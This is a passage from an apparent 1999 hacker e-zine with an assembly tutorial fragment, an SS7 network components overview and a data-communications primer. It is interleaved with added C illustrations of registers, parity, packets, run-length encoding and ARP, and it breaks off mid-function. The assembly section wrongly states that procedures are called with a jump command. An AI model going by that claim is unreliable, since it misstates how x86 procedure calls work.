        mov ax, 4c00h           ; subroutine 4ch of int 21h (ah = 4ch) with exit code 0
        int 21h                 ; this ends the program
END start                       ; END tells the assembler where the source stops
-------------------cut here--------------------
This is the simplest program in assembly language. It just prints the
message "hello" to the screen. All strings in assembly language have to be
terminated with the $ character.
Like in most other languages, you can define procedures in assembly language.
You do this like this
.
.
[Code]
.
.
.
.
procedure_name:
.
.
.
.
Where procedure_name would be the name you give to the procedure. To call a
procedure in assembly language you have to use a jump command, there are
several of these but the most basic is simply
jmp [procedure]
this simply takes you to that procedure. There are different kinds of jump
statements though, these act rather like if statements in other languages,
and allow control flow in the program. With conditional jumps, there has to
be a way of comparing values. This is the cmp command. It works like this
cmp ah, 5 ; is ah == 5?
jne no ; if it isn't 5, jump to the procedure 'no'
there are many different jump statements that use the compare command. Here
is a list of some of them
JA: Jump if the first number was above the second number
JB: Jump if the first number was below the second number
JE: Jump if both numbers were equal
JAE: Jump if the first number was above or equal to the second number
JBE: Jump if the first number was below or equal to the second number
JNA: Jump if the first number was not above the second number
JNB: Jump if the first number was not below the second number
JNE: Jump if both numbers were not equal
JNAE: Jump if the first number was not above or equal to the second number
JNBE: Jump if the first number was not below or equal to the second number
There are other jump commands but these are the most common ones.
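The register aliases, the LIFO stack and the jump table above, modelled in C as an added illustration (this is not code from Bodie's article): it runs the tutorial's push/pop swap and its `cmp ah,5 / jne` test, and assumes a little-endian host such as x86 for the byte layout inside the union.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* One general purpose register with the aliases the tutorial describes:
   E[A-D]X is the full 32 bits, [A-D]X is its low 16 bits, and [A-D]L / [A-D]H
   are the low and high bytes of [A-D]X.  On a little-endian host such as x86
   (assumed here) the low byte is stored first, as in the diagram above. */
typedef union {
    uint32_t e;                  /* E[A-D]X */
    uint16_t x;                  /* [A-D]X  */
    struct { uint8_t l, h; } b;  /* [A-D]L, [A-D]H */
} gpr;

#define STACK_WORDS 64

typedef struct {
    gpr ax, bx, cx, dx;          /* the four general purpose registers */
    uint16_t stack[STACK_WORDS]; /* the stack area; the highest index is the bottom */
    int sp;                      /* stack pointer: index of the last item pushed */
    bool zf, cf;                 /* zero and carry flags, written by CMP */
} cpu;

/* Fresh CPU: all registers zero, empty stack (SP just past the top of the area). */
void cpu_reset(cpu *c) {
    *c = (cpu){0};
    c->sp = STACK_WORDS;
}

/* PUSH: the item goes into the next lower free slot and SP moves onto it. */
bool push16(cpu *c, uint16_t v) {
    if (c->sp == 0) return false;            /* stack area exhausted */
    c->stack[--c->sp] = v;
    return true;
}

/* POP: hands back the last item pushed (LIFO) and moves SP back up. */
bool pop16(cpu *c, uint16_t *out) {
    if (c->sp == STACK_WORDS) return false;  /* nothing left on the stack */
    *out = c->stack[c->sp++];
    return true;
}

/* CMP first, second: computes first - second but keeps only the flags.
   JA/JB are unsigned comparisons, so CF is the unsigned borrow. */
void cmp16(cpu *c, uint16_t first, uint16_t second) {
    c->zf = (first == second);
    c->cf = (first < second);
}

typedef enum { JA, JB, JE, JAE, JBE, JNA, JNB, JNE, JNAE, JNBE } jcc;

/* Would this conditional jump be taken after the last CMP?  Each case is one
   line of the jump table; the paired mnemonics are the same test. */
bool jump_taken(const cpu *c, jcc j) {
    switch (j) {
    case JA:  case JNBE: return !c->cf && !c->zf;   /* above */
    case JB:  case JNAE: return  c->cf;             /* below */
    case JAE: case JNB:  return !c->cf;             /* above or equal */
    case JBE: case JNA:  return  c->cf || c->zf;    /* below or equal */
    case JE:             return  c->zf;
    case JNE:            return !c->zf;
    }
    return false;
}

/* The tutorial's four-line program: push ax / push bx / pop ax / pop bx.
   The stack is LIFO, so bx comes off first (into ax) and then ax (into bx). */
bool swap_via_stack(cpu *c) {
    return push16(c, c->ax.x) && push16(c, c->bx.x)
        && pop16(c, &c->ax.x) && pop16(c, &c->bx.x);
}

int main(void) {
    cpu c;
    cpu_reset(&c);

    c.ax.e = 0x12345678u;                    /* mov eax, 12345678h */
    printf("EAX=%08X AX=%04X AH=%02X AL=%02X\n",
           (unsigned)c.ax.e, c.ax.x, c.ax.b.h, c.ax.b.l);

    c.ax.x = 10;                             /* mov ax, 10 */
    c.bx.x = 20;                             /* mov bx, 20 */
    swap_via_stack(&c);
    printf("after swap: AX=%u BX=%u, SP back at %d (stack empty)\n",
           c.ax.x, c.bx.x, c.sp);

    c.ax.b.h = 7;                            /* mov ah, 7 */
    cmp16(&c, c.ax.b.h, 5);                  /* cmp ah, 5 */
    printf("cmp ah,5: jne taken=%d  ja taken=%d  je taken=%d\n",
           jump_taken(&c, JNE), jump_taken(&c, JA), jump_taken(&c, JE));
    return 0;
}
```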
Next time I'll show you how to write some basic programs and generally play
about with the language. Keep reading
----------
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ SS7 Network Components ]::[OO--[ digiphreq ]-------------------
-->]OO[::::::::::::::::::::::::::::::::::::::[ digiphreq@webcrunchers.com ]--
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Components of an SS7 Network
Darkcyde Communications 1999.
digiphreq@webcrunchers.com
written 3.29.99 released a long time afterwards....
This paper is intended as a brief overview of the components that make up an
SS7 network: what they do, how they relate to the other components and so on.
This file won't be very complicated, but more of a small tutorial which just
scrapes the surface of SS7 as a whole. It will focus more on the networking
side than anything else.
I. STP
II. SP
III. Datalinks
A. Access Links
B. Bridge Links
C. Cross Links
D. Diagonal Links
E. Extended Links
F. Fully Associated Links
IV. A Good Fuck You, I'm Out
I. STP:
The STP or Signaling Transfer Point is basically the "switch" of the
SS7 network, rather like a switch in the PSTN. The difference is that a PSTN
switch routes voice calls, while the STP routes signaling messages between
the other signaling points, using the point codes carried in each message.
The pairing and networking of STPs is simple in principle but can get quite
involved in practice. STPs are always deployed in mated pairs, and the pairs
are arranged in a hierarchy. At the bottom you have STP pairs that provide
access and routing for the switches of a local network. Above them you have
the STP pairs that connect one network's STPs to another's (over the link
types discussed later). At the top you have the STP pairs which completely
run the show, routing everything on a regional, national or international
scale. Graphically it looks kind of like this.
Local to Local
Local to Regional
Regional to Regional
Regional to International
International to International
Regional to International
Regional to Regional
Local to Regional
Local to Local
II. SP:
The SP or Signaling Point is a lot like a telephone number on the
PSTN. In SS7 every node is addressed by an SPC or Signaling Point Code, and
any node with such a code is a Signaling Point. SP also turns up as a suffix
in the names of the more specific kinds of node. You have the SSP, the SCP
and the MSC.
SSP (Service Switching Point) - This is the telephone switch side of
the SS7 network: it sets up and tears down the voice connections
and generates the signaling for them.
SCP (Service Control Point) - This node offers database services,
such as translating a dialled number into the one that is actually
routed to. The SSPs query it when a call needs such a lookup.
MSC (Mobile Switching Centre) - This node is in control of the mobile
units and provides their voice connections.
III. Data Links:
In the SS7 network you must send signaling data of numerous types to other
SPs, and this is done over links. The link types are defined not by how the
bits are physically carried but by which kinds of node they connect, and so
by what they carry. That gives you several types of link, one for each
job.
(A) Access Links
(B) Bridge Links
(C) Cross Links
(D) Diagonal Links
(E) Extended Links
(F) Fully Associated Links
Access Links (A links) - These connect an end node such as an SSP or
SCP to its home STP pair. A node normally has one A link to each STP
of the pair, so that losing one STP does not cut it off.
Bridge Links (B links) - These connect one mated STP pair to another
STP pair at the same level of the hierarchy. They are deployed as a
quad: four links joining the two STPs of one pair to the two STPs
of the other, so that any single link or STP can fail and the route
survives. The more of these you have, the more flexibility in
routing between areas you will have.
Cross Links (C links) - So that one STP of a pair failing does not
take its partner's routes with it, the two STPs of a mated pair are
joined by Cross Links. Normally the pair shares the load and the
C links sit idle; they only carry traffic when the other routes
out of an STP are unavailable.
Diagonal Links (D links) - These are exactly like Bridge Links only
that they connect a local STP pair up to a Regional STP pair, which
may have several of these smaller networks hooked to it. Just
remember they are Bridge Links which connect a lower level to a
higher one, and they also come in quads.
Extended Links (E links) - These connect an end node (an SSP) directly
to a remote STP pair other than its home pair. The home pair is still
reached over the A links; the E links give an alternative way out if
the home pair, or the route through it, is lost. Kind of like this.
Home STP pair ............................ Remote STP pair
|                                          /
| A links                                 / E links
|                                        /
SSP ____________________________________/
Fully Associated Links (F links) - These connect two end nodes (for
example two switches) directly to each other with no STP in between.
This is typically done when one company owns both nodes and has a lot
of signaling between them; the nodes are then "associated" with each
other, which is where the name comes from.
Ok, well that's it. If it thoroughly confused you, read it again. If you
already knew this crap, good for you smart ass. Why don't you go learn
something new now. I hope to put a more detailed article on Components of an
SS7 Network up soon.
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ Electronic Data Communication ]::[OO---------[ zomba ]----------
-->]OO[:::::::::::::::::::::::::::::::::::::::[ z0mba@hotmail.com ]----------
-->[OO]:::::::::::::::::::::::::::::::::::::::[ members.xoom.com/phuk ]::::::
--oOo--> Covered in this Article: ]------------------------
--oOo--> --------------------------------------------------
--oOo--> Introduction ]---
--oOo--> PRINCIPLE OF ELECTRONIC DATA COMMUNICATION ]---
--OoO--> ========================================== ]---
--oOo--> --> Communications Links ]---
--oOo--> --> Communications Media ]---
--oOo--> --> Modems ]---
--oOo--> --> Multiplexors ]---
--oOo--> COMMUNICATION METHODS ]---
--oOo--> ===================== ]---
--oOo--> --> Simplex/duplex Transmission ]---
--oOo--> --> Synchronous and Asynchronous Transmission ]---
--oOo--> --> Data transfer checks ]---
--oOo--> --> Circuit Switching ]---
--oOo--> --> Packet Switching ]---
--oOo--> --> Advantages of Packet Switching ]---
--oOo--> --> Data Compression ]---
--oOo--> --> Data Encryption ]---
--oOo--> --> The TCP/IP Protocol ]---
--oOo--> --> The ISO OSI seven-layer Model ]---
--oOo--> --> Bridges and Gateways/Routers ]---
Introduction
--oOo-------
This article is meant to give you, the ereet public, a brief insight into how
data communications werk. The parts on TCP/IP and the ISO OSI seven-layer
model were originally part of a file I was writing for ETG (now defunct) but
I thought they were relevant to this article and so have included them. If
you have been using the net for a while then the OSI model will be instantly
recognisable even if you've never seen it before, because it is just a way of
laying out the things you already know: which protocol does what, and which
port it lives on (ie: Telnet, port 23). A lot of this article was taken from
other sources as they explained better than I ever could :)
PRINCIPLE OF ELECTRONIC DATA COMMUNICATION
==========================================
Data communication involves sending and receiving data from one computer or
data processing device to another. Applications using for example e-mail,
supermarket EPOS (Electronic Point-Of-Sale) terminals, cash dispensers, fax
machines and video conferencing are all examples of this.
When the devices are close together, for example in the same building, they
can be linked by means of cables. However, when devices are separated by more
than a few hundred yards, data has to be sent over a communications link (eg.
a telephone line) and extra equipment such as a modem is required.
Communications Links
--oOo---------------
In the UK, BT, Mercury and other telcos provide services and data links.
Telephone lines may be either:
--> public lines, on which the cost of sending data depends on the
length of time taken;
--> private or leased lines, for which there is a fixed annual fee
and the line can be used 24/7 with no extra cost.
Communications Media
--oOo---------------
Communication may take place over a combination of different media.
--> twisted pair (copper cable), used in much of the PSTN;
--> coaxial cable - high quality, well-insulated cable that can transmit
data at higher speeds;
--> fibre optic cable through which pulses of light, rather than electricity,
are sent in digital form;
--> communications satellite, using one of the hundreds of satellites now
in geostationary orbit about 22,000 miles above the Earth (for all you
l4m3rs, geostationary means that they orbit at the same rate as the
Earth rotates and are therefore stationary relative to a point on it);
--> microwave - similar to radio waves. Microwave stations cannot be much
more than 30 miles apart because of the Earth's curvature, as microwaves
travel in straight lines.
The amount of data that can be sent over the line depends partly on the
bandwidth, which is the range of frequencies that the line can carry. The
greater the bandwidth, the greater the rate at which data can be sent, and
the more separate messages can be carried on the line simultaneously.
A network that is capable of carrying voice, video and computer data over the
same digital connection is called an 'integrated services digital network'
(ISDN), and this requires more bandwidth than an ordinary voice line.
Modems
--oOo-
Telephone lines were originally designed for speech, which is transmitted in
analogue or wave form. In order for digital data to be sent over a telephone
line, it must first be converted to analogue form and then converted back to
digital at the other end. This is achieved by means of a modem (MOdulator
DEModulator) at either end of the line.
Digital Signal Digital Signal
\ /
\ Analogue Signal /
Computer------Modem--------------------------------Modem------Computer
Multiplexors
--oOo-------
A multiplexor combines more than one input signal into a stream of data that
can be transmitted over a single communications channel. This means, for
example, that a local area network of 48 PCs could all communicate with a
mainframe at some geographically remote head office via a single leased line
attached to a multiplexor. At the mainframe end, there is likely to be a
front-end processor which will handle the communications, leaving the main
processor free for other tasks.
Computer\
\ ___ Mini
\ / mainframe
Computer---Multiplexor---Modem------------------Modem---Multiplexor---- -or-
/ \___ front-end
/ processor
Computer/
COMMUNICATION METHODS
=====================
Simplex, half-duplex and full-duplex transmission
--oOo--------------------------------------------
There are three possible modes of transmission:
--> Simplex - transmission can take place only in one direction. This type
of transmission could be used for example when the sending
device such as a temperature sensor never requires a response
from the computer.
--> Half-duplex - transmission can take place in both directions but not
simultaneously. This type of transmission is often used
between a central computer and terminals.
--> Full-duplex - transmission can take place in both directions
simultaneously. It is suitable for interactive computer
applications.
Synchronous and Asynchronous transmission
--oOo-----------------------------------
With asynchronous transmission, one character at a time is sent, with each
character being preceded by a start bit and followed by a stop bit. A parity
bit is also usually included as a check against incorrect transmission. This
type of transmission is usually used by PCs, and is simple and economical for
relatively small amounts of data.
In synchronous transmission mode, timing signals (a clock shared by both
ends) control the rate of transmission and there is no need for start and
stop bits to accompany each character, so whole blocks of data are sent with
far less framing overhead. Mainframe computers usually use synchronous
transmission. It is more efficient than asynchronous transmission for large
amounts of data.
Data Transfer Checks
--oOo---------------
The following checks may be made during data transmission:
--> parity checks - an extra bit is transmitted with each character to make
the number of bits set to 1 even (for even parity) or
odd (for odd parity). This catches any single flipped
bit, but two flipped bits in the same character cancel
out and go unnoticed.
--> checksum - may be sent with each block of data transmitted. All the
elements in the block (eg: words or bytes) are added together
(ignoring overflow) to produce a single element known as the
checksum, and this is stored and transmitted with the block,
and checked on receipt.
Both are checks against accidental corruption only. Anyone who can alter the
data on the line can just as easily recompute the parity or checksum to
match it, so neither gives any protection against deliberate tampering.
Circuit Switching
--oOo------------
An excellent example of circuit switching is the public telephone system,
which uses circuit-switched paths. When a caller dials a number, the path
between the two telephones is set up by operating switches in all of the
exchanges involved in the path, and the circuit is set up and held for the
entire duration of the call (even through periods of silence). This allows
the two people on the phone ('leeto phreaks!) to hold a conversation with no
waiting at either end.
ph0ne____________
\ \ /
\ \ /
ph0ne____________Local Exchange--------Trunk Exchange /
/ | \ /
/ | \ /
ph0ne____________/ | \__Trunk Exchange----
| /
/ _________/
/ /
Trunk Exchange ph0ne
ph0ne_______ ___________/ \__________ /
\ / \ /
Local Exchange Local Exchange
/ | \ \
/ | \ \ph0ne
ph0ne ph0ne \__ph0ne
Packet Switching
--oOo-----------
In a packet switching system (PSS) data is divided into packets - fixed
length blocks of data, say 128 bytes (the last packet of a message may be
shorter). As well as the data, each packet also carries:
--> the source and destination address;
--> a packet sequence number so that the whole message can be correctly
reassembled, whatever order the packets arrive in;
--> a checksum (longitudinal parity check) for the purpose of error checking.
The PSS takes the form of a computer network in which each computer redirects
packets it receives to the next computer along an appropriate route to their
destination.
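The parity and checksum checks from 'Data transfer checks' and the packet layout just described, as an added example in C that is not part of the original article. The message, the addresses and the 8-byte packet size are constructed for the demo (a real PSS used larger packets, as the text says). It shows the check that catches a single flipped bit, the double flip that parity misses, and reassembly of packets that arrive out of order.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Parity bit for a 7-bit character so that the 8-bit frame has an even
 * number of 1s (even parity). Odd parity is simply the complement. */
static int even_parity_bit(uint8_t c)
{
    int ones = 0;
    for (int i = 0; i < 7; i++) ones += (c >> i) & 1;
    return ones & 1;
}

/* Receiver side: does the 8-bit frame (7 data bits + parity) still have an
 * even number of 1s? One flipped bit fails this; two flipped bits pass. */
static int even_parity_ok(uint8_t frame)
{
    int ones = 0;
    for (int i = 0; i < 8; i++) ones += (frame >> i) & 1;
    return (ones & 1) == 0;
}

/* Block checksum: add every byte, ignoring overflow (keep the low 8 bits). */
static uint8_t block_checksum(const uint8_t *p, size_t n)
{
    uint8_t sum = 0;
    for (size_t i = 0; i < n; i++) sum = (uint8_t)(sum + p[i]);
    return sum;
}

/* Longitudinal parity (LRC): XOR of every byte, i.e. a parity bit for each
 * bit position across the block. Same blind spot as parity: two errors in
 * the same bit position cancel out. */
static uint8_t lrc(const uint8_t *p, size_t n)
{
    uint8_t x = 0;
    for (size_t i = 0; i < n; i++) x ^= p[i];
    return x;
}

#define PKT_DATA 8     /* toy fixed packet size; a real PSS would use 128 */
#define MAX_PKTS 16

typedef struct {
    uint8_t src, dst;         /* source and destination address */
    uint8_t seq;              /* sequence number for reassembly */
    uint8_t len;              /* bytes of data actually used */
    uint8_t data[PKT_DATA];
    uint8_t check;            /* LRC over everything above */
} packet_t;

static uint8_t pkt_lrc(const packet_t *p)
{
    return lrc((const uint8_t *)p, offsetof(packet_t, check));
}

/* Split msg into fixed-size packets; the last one may be shorter. */
static int packetize(uint8_t src, uint8_t dst, const uint8_t *msg, size_t n,
                     packet_t *out, int max)
{
    int count = 0;
    for (size_t off = 0; off < n && count < max; off += PKT_DATA, count++) {
        packet_t *p = &out[count];
        memset(p, 0, sizeof *p);
        p->src = src; p->dst = dst; p->seq = (uint8_t)count;
        p->len = (uint8_t)(n - off < PKT_DATA ? n - off : PKT_DATA);
        memcpy(p->data, msg + off, p->len);
        p->check = pkt_lrc(p);
    }
    return count;
}

/* Put packets that arrived in any order back together. Returns the message
 * length, or -1 if a packet fails its check or a sequence number is missing. */
static int reassemble(const packet_t *pk, int count, uint8_t *out, size_t cap)
{
    const packet_t *slot[MAX_PKTS] = {0};
    if (count > MAX_PKTS) return -1;
    for (int i = 0; i < count; i++) {
        if (pk[i].seq >= MAX_PKTS || pk[i].check != pkt_lrc(&pk[i])) return -1;
        slot[pk[i].seq] = &pk[i];
    }
    size_t n = 0;
    for (int s = 0; s < count; s++) {
        if (!slot[s] || n + slot[s]->len > cap) return -1;
        memcpy(out + n, slot[s]->data, slot[s]->len);
        n += slot[s]->len;
    }
    return (int)n;
}

/* Constructed round trip: packets arrive in reverse order; with corrupt != 0
 * one bit is flipped in transit. Returns bytes reassembled, or -1 if caught. */
static int demo_roundtrip(int corrupt)
{
    static const uint8_t msg[] = "w0rd to the darkcyde collective";   /* 31 bytes */
    packet_t pk[MAX_PKTS], net[MAX_PKTS];
    uint8_t buf[64];
    int n = packetize(1, 2, msg, sizeof msg - 1, pk, MAX_PKTS);
    for (int i = 0; i < n; i++) net[i] = pk[n - 1 - i];
    if (corrupt) net[0].data[0] ^= 0x01;
    return reassemble(net, n, buf, sizeof buf);
}

int main(void)
{
    printf("intact: %d bytes, corrupted: %d\n", demo_roundtrip(0), demo_roundtrip(1));
    return 0;
}
```

Note that the LRC over the header also catches a packet whose sequence number was damaged, which is why the check covers the whole packet and not just the data.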
Advantages of packet switching
--oOo-------------------------
--> More efficient use of lines is possible, since a line is only occupied
while a packet is actually crossing it.
--> Cost depends only on the number of packets sent, not on distance, so all
data is transmitted at local call rates.
--> It is less likely to be affected by network failure because of the
multiple routes available to transmit data packets.
--> Interception is a little harder than on a circuit, because the packets
of one message may be sent along different routes or be interleaved with
other unrelated packets. Don't mistake this for security though: anyone
sitting on a node or line the packets pass through sees them in full, and
each packet carries its source and destination address in the clear. If
the data matters, encrypt it (see below).
Data Compression
--oOo-----------
Data compression is frequently used when transmitting large quantities of
data, thereby reducing the number of blocks transmitted and hence the cost.
The simplest method, run-length encoding, works by replacing each run of
repeated bytes by one copy of the byte plus a count of the repetitions. Real
modems and archivers use cleverer schemes, but the principle is the same:
squeeze the redundancy out before the data hits the line.
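Run-length encoding as an added example in C, not from the original article: the encoder and decoder for the (count, byte) scheme described above, plus the check a decoder needs so that a hostile count cannot run it off the end of its output buffer. The sample strings are constructed for the demo.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Run-length encode: every run of up to 255 equal bytes becomes the pair
 * (count, byte). Returns bytes written, or -1 if `out` is too small. Data
 * with no repeats gets bigger, not smaller (two output bytes per input byte). */
static int rle_encode(const uint8_t *in, size_t n, uint8_t *out, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; i < n; ) {
        size_t run = 1;
        while (i + run < n && in[i + run] == in[i] && run < 255) run++;
        if (o + 2 > cap) return -1;
        out[o++] = (uint8_t)run;
        out[o++] = in[i];
        i += run;
    }
    return (int)o;
}

/* Decode. The bound check on every pair is what stops a hostile stream such
 * as (255,'A') repeated a few thousand times (a "decompression bomb") from
 * writing past the end of `out`. */
static int rle_decode(const uint8_t *in, size_t n, uint8_t *out, size_t cap)
{
    if (n % 2) return -1;                 /* dangling count without a byte */
    size_t o = 0;
    for (size_t i = 0; i < n; i += 2) {
        size_t run = in[i];
        if (run == 0 || o + run > cap) return -1;
        memset(out + o, in[i + 1], run);
        o += run;
    }
    return (int)o;
}

static uint8_t enc_buf[64], dec_buf[64];   /* scratch space for the demo */

/* Constructed sample: encodes `text`, decodes it again and returns the
 * encoded length, or -1 if the round trip did not reproduce the input. */
static int rle_roundtrip(const char *text)
{
    size_t n = strlen(text);
    int e = rle_encode((const uint8_t *)text, n, enc_buf, sizeof enc_buf);
    if (e < 0) return -1;
    int d = rle_decode(enc_buf, (size_t)e, dec_buf, sizeof dec_buf);
    if (d != (int)n || memcmp(dec_buf, text, n) != 0) return -1;
    return e;
}

/* A 4-byte stream that claims 510 bytes of output: must be rejected. */
static int rle_bomb_demo(void)
{
    static const uint8_t bomb[4] = { 255, 'A', 255, 'A' };
    return rle_decode(bomb, sizeof bomb, dec_buf, sizeof dec_buf);
}

int main(void)
{
    printf("'aaaabbc'  -> %d bytes\n", rle_roundtrip("aaaabbc"));    /* 6: shrinks */
    printf("'darkcyde' -> %d bytes\n", rle_roundtrip("darkcyde"));   /* 16: grows */
    printf("bomb       -> %d\n", rle_bomb_demo());                    /* -1 */
    return 0;
}
```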
Data Encryption
--oOo----------
Data encryption is used for security purposes when transmitting or storing
confidential data. The data to be transmitted is scrambled using a
mathematical algorithm and a secret key, so that even if it is intercepted it
cannot be read by anyone who does not hold the key. Old-fashioned
substitution of letters counts as encryption in name only: it falls to
frequency analysis in minutes, so use a proper cipher, and remember that the
secrecy lives in the key, not in the algorithm.
w0rd to the OfKIZk\$5zG w0rd to the
darkcyde ---> ENCRYPTION --> OPbNd5%6S --> DECRYPTION --> darkcyde
collective WeDgNC$£1GG8 collective
Plaintext Ciphertext Plaintext
The TCP/IP Protocol
--oOo--------------
Basically, TCP/IP is a set of protocols developed around the ARPAnet (where
the internet began - just in case you didn't know!) which allows co-operating
computers to share resources across a network. The most accurate name for
this set of protocols is the 'Internet Protocol Suite' - TCP and IP are just
two of the protocols in this suite. Because TCP and IP are the best known of
all the protocols, they have been joined to create the most common term -
TCP/IP.
TCP/IP protocols map to a four layered conceptual model: Application,
Transport, Internet, and Network Interface. Each layer of the TCP/IP model
corresponds to one or more layers of the International Organization for
Standardization (ISO) seven-layer Open Systems Interconnection (OSI) model,
which I will go into more detail on later in the file. Below I have attempted
to draw a diagram that shows this.
OSI Model TCP/IP Model
|--------------| |-----------------|
| Application | | |
|--------------| | |
| Presentation | | Application |
|--------------| | |
| Session | | |
|--------------| |-----------------|
| Transport | | Transport |
|--------------| |-----------------|
| Network | | Internet |
|--------------| |-----------------|
| Data-link | | |
|--------------| |Network Interface|
| Physical | | |
|--------------| |-----------------|
Defined within the four layers of TCP/IP are protocols that dictate how
computers connect and communicate. The most common of these are Transmission
Control Protocol (TCP), User Datagram Protocol (UDP), Internet Protocol (IP),
Address Resolution Protocol (ARP), and Internet Control Message Protocol
(ICMP).
Transmission Control Protocol (TCP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the most common higher-level protocol in the suite. TCP guarantees
the delivery of packets, ensures proper sequencing of data, and provides a
checksum feature that validates both the packet header and its data for
accuracy. If the network either corrupts or loses a TCP packet during
transmission, TCP is responsible for re-transmitting the faulty packet. This
level of reliability makes TCP the protocol of choice for session-based data
transmission, client-server applications, and critical services such as
email.
This reliability however has its downfalls - TCP headers require additional
bits to provide proper sequencing of information, as well as a mandatory
checksum to ensure reliabilty of both the TCP packet header and the packet
data. To guarantee successful data delivery, the protocol also requires that
the recipient acknowledge successful receipt of data.
Such acknowledgements (ACK's) generate additional network traffic, thus
diminishing the rate at which data passes. To reduce the impact on
performance, most hosts send an acknowledgement for every other segment or
when a specified time interval has passed.
User Datagram Protocol (UDP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If reliability is not essential then UDP, TCP's complement, offers a
connectionless datagram service that guarantees neither delivery nor correct
sequencing of delivered packets (much like IP). Higher-level protocols or
applications must provide their own reliability mechanisms on top of UDP/IP.
UDP data checksums are optional in IPv4 (a sender that skips the check puts
a zero in the checksum field), providing a way to exchange data over highly
reliable networks without unnecessarily consuming network resources or
processing time. When UDP checksums are used, they validate both the
integrity of the header and the data. ACKs are not enforced by the UDP
protocol; this is left to higher-level protocols. UDP also supports sending
data from a single sender to multiple receivers (broadcast and multicast).
Being connectionless also means there is no handshake: a datagram with a
forged source address is accepted just like any other, which is why a UDP
service has to be careful about how much work it will do for an unverified
sender.
Internet Protocol (IP)
~~~~~~~~~~~~~~~~~~~~~~
IP provides packet delivery for all other protocols within the suite. It
provides a best-effort, connectionless delivery system for computer data.
Packets are not guaranteed to be delivered, nor to arrive in the order they
were sent, and the protocol's checksum only covers the header, not the data.
The integrity of the data carried in IP packets is only ensured by the
higher-level protocols.
Address Resolution Protocol (ARP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ARP is not directly related to data transport but is very important
nonetheless. ARP is one of the maintenance protocols that supports the TCP/IP
suite and is usually invisible to users and applications.
If two systems are to communicate over a TCP/IP network, the system sending
the packet must map the IP address of the next hop (the final destination if
it is on the same network, otherwise the router) to its physical address. IP
acquires this physical address by broadcasting a special inquiry packet (an
ARP request) containing the IP address in question. All ARP-enabled systems
on the local network see the broadcast, and the system that owns the IP
address replies by sending its physical address to the requester (in an ARP
reply). The IP-to-physical mapping is then stored in the ARP cache of the
requesting system for subsequent use.
Because the ARP reply can also be broadcast to the network, other systems on
the network can use this information to update their own ARP caches. (You can
use the 'arp' utility to view the ARP table.) Note that nothing in ARP proves
a reply came from the real owner of the address: a cache will accept a reply
from anyone on the segment, so a fresh reply that contradicts an entry you
already hold is worth noticing.
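The ARP exchange described above, as an added example in C that is not from the original article. The hosts, IP addresses and MACs are made up for the demo (10.0.0.1 and 10.0.0.2 on one segment); the packet layout is the real 28-byte Ethernet/IPv4 one from RFC 826. The last function shows why the caveat matters: a reply from a third party for an address already in the cache looks exactly like a genuine one, and comparing it with what is already cached is the only check available.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* ARP over Ethernet/IPv4: a 28-byte packet (RFC 826), all fields big-endian. */
#define ARP_REQUEST 1
#define ARP_REPLY   2
#define CACHE_SIZE  8

typedef struct {
    uint16_t htype, ptype;    /* 1 = Ethernet, 0x0800 = IPv4 */
    uint8_t  hlen, plen;      /* 6-byte MAC, 4-byte IP */
    uint16_t oper;            /* ARP_REQUEST or ARP_REPLY */
    uint8_t  sha[6], spa[4];  /* sender hardware / protocol address */
    uint8_t  tha[6], tpa[4];  /* target hardware / protocol address */
} arp_t;

static void     put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static uint16_t get16(const uint8_t *p)       { return (uint16_t)((p[0] << 8) | p[1]); }

/* Serialise to the wire format. */
static void arp_pack(const arp_t *a, uint8_t out[28])
{
    put16(out, a->htype); put16(out + 2, a->ptype);
    out[4] = a->hlen; out[5] = a->plen; put16(out + 6, a->oper);
    memcpy(out + 8, a->sha, 6);  memcpy(out + 14, a->spa, 4);
    memcpy(out + 18, a->tha, 6); memcpy(out + 24, a->tpa, 4);
}

/* Parse from the wire; returns 0 for anything that is not Ethernet/IPv4 ARP. */
static int arp_parse(const uint8_t *in, size_t n, arp_t *a)
{
    if (n < 28) return 0;
    a->htype = get16(in); a->ptype = get16(in + 2);
    a->hlen = in[4]; a->plen = in[5]; a->oper = get16(in + 6);
    if (a->htype != 1 || a->ptype != 0x0800 || a->hlen != 6 || a->plen != 4) return 0;
    memcpy(a->sha, in + 8, 6);  memcpy(a->spa, in + 14, 4);
    memcpy(a->tha, in + 18, 6); memcpy(a->tpa, in + 24, 4);
    return 1;
}

/* The requester's ARP cache: IP -> MAC. */
typedef struct { uint8_t ip[4], mac[6]; int used; } arp_entry_t;
static arp_entry_t cache[CACHE_SIZE];

/* Learn from a reply. Returns 1 if a new mapping was stored, 0 if it merely
 * confirmed the cached one, -1 if it CONTRADICTS the cached MAC (nothing in
 * ARP proves who sent a reply, so this is the only hint of a bogus sender
 * you get) and -2 if the cache is full. */
static int arp_learn(const arp_t *a)
{
    if (a->oper != ARP_REPLY) return 0;
    for (int i = 0; i < CACHE_SIZE; i++)
        if (cache[i].used && memcmp(cache[i].ip, a->spa, 4) == 0)
            return memcmp(cache[i].mac, a->sha, 6) == 0 ? 0 : -1;
    for (int i = 0; i < CACHE_SIZE; i++)
        if (!cache[i].used) {
            memcpy(cache[i].ip, a->spa, 4); memcpy(cache[i].mac, a->sha, 6);
            cache[i].used = 1;
            return 1;
        }
    return -2;
}

/* The exchange: A (10.0.0.1) broadcasts "who has 10.0.0.2?", B answers with
 * its MAC, A parses the reply and caches it. Returns what arp_learn says. */
static int arp_exchange_demo(void)
{
    static const uint8_t a_mac[6] = {0x02,0,0,0,0,0x01}, b_mac[6] = {0x02,0,0,0,0,0x02};
    uint8_t wire[28];
    arp_t req = { 1, 0x0800, 6, 4, ARP_REQUEST,
                  {0x02,0,0,0,0,0x01}, {10,0,0,1}, {0,0,0,0,0,0}, {10,0,0,2} };
    arp_t seen, reply;
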